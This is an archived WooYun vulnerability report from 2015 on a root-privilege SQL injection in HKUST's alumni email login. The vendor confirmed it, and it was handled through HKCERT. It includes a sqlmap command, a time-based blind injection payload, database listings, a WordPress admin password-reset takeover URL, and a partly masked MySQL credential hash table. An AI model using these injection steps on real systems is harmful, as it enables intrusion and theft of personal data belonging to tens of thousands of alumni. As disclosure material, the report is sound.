当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147118

漏洞标题:香港科技大学某邮箱服务接口ROOT权限SQL注入漏洞(影响5万名校友用户)(香港地區)

相关厂商:香港科技大学

漏洞作者: 路人甲

提交时间:2015-10-16 10:30

修复时间:2015-12-04 12:40

公开时间:2015-12-04 12:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-16: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开

简要描述:

香港科技大学某邮箱服务登陆接口存在ROOT权限的SQL注入漏洞(影响5万名校友用户)。
利用同服务器的wordpress,直接使用找回密码,即可获取服务器系统权限。
/wp-login.php?action=rp&key=[database_key]&login=admin

详细说明:

#1 问题服务器
https://**.**.**.**/ (校友,已毕业的同学使用的邮件服务),可登陆office365

ust_1.jpg


#2 注入点
注入参数:username

https://**.**.**.**/o_login_connect.php (POST)
username=CasterPy&agreecheck=CasterPy&password=CasterPy&StuID=CasterPy


#3 注入利用

available databases [7]:
[*] alum
[*] alumni_db
[*] alumniDB2
[*] information_schema
[*] mysql
[*] others
[*] wordpress


ust_data.jpg


#~ 接近5万名校友资料

python sqlmap.py -u "https://**.**.**.**/o_login_connect.php" --data "username=CasterPy&agreecheck=CasterPy&password=CasterPy&StuID=CasterPy" -D alumniDB2 -T tblpersonal --count
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=CasterPy' AND (SELECT * FROM (SELECT(SLEEP(5)))RsWD) AND 'ZqVh'='ZqVh&agreecheck=CasterPy&password=CasterPy&StuID=CasterPy
---
[10:28:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.12
[10:28:33] [INFO] resumed: 48145
Database: alumniDB2
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| tblpersonal | 48145   |
+-------------+---------+

漏洞证明:

#4 wordpress,直接使用找回密码,即可获取服务器系统权限

https://**.**.**.**/blog/wp-login.php?action=rp&key=[database_key]&login=admin
select * from wp_wordpressusers


#5 MYSQL用户表

Host,User,Password
%,alumni_db,*4E89CAE278953****************9D4B31376E872
**.**.**.**,root,*ABA7DE9AAE02B****************CBD20FB1953CF73A
**.**.**.**,aen,*1D82FFF07****************09C47A0E56072CFC
**.**.**.**,alumni_db,<blank>
**.**.**.**,alumni_db,<blank>
**.**.**.**,alumni_db,42cc****************19695
**.**.**.**,alumni_db,42cc****************19695
**.**.**.**,alumni_db,42cc****************19695
imap-1.**.**.**.**,alumni_db,42cc****************19695
imap.**.**.**.**,alumni_db,<blank>
imap.**.**.**.**,root,42cc****************19695
ldap.**.**.**.**,alumni_db,5290eb*******96f5e
localhost,<blank>,*3A0C8F8E53****************AD45483E64CED3E
localhost,alum,*E43E1D274****************30EF4551B86EA
localhost,alumni_db,*ABA7DE9AAE02B****************CBD20FB1953CF73A
localhost,root,<blank>
localhost,wordpress,*4E89CAE278953****************9D4B31376E872
n**.**.**.**,alumni_db,*4E89CAE278953****************9D4B31376E872
**.**.**.**,aen,39c2b****************b8b1b
**.**.**.**,aen,39c2b****************b8b1b
**.**.**.**,aen,39c2b****************b8b1b
**.**.**.**,alumni_db,42cc****************19695
**.**.**.**,aen,39c2b****************b8b1b
**.**.**.**,aen,51a71a****************9ad
**.**.**.**,alumni_db,4d68****************6729
www-1.**.**.**.**,<blank>,2e8**********20720
www-1.**.**.**.**,alumni_db,2e8********20720
www-1.**.**.**.**,root,42cc****************19695
www-dev.**.**.**.**,<blank>,<blank>
www-dev.**.**.**.**,alumni_db,42cc****************19695


#6 mysql可直接远程连接

ust_mysql.jpg

修复方案:

# 修复注入漏洞

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-10-20 12:39

厂商回复:

已聯絡相關機構處理

最新状态:

暂无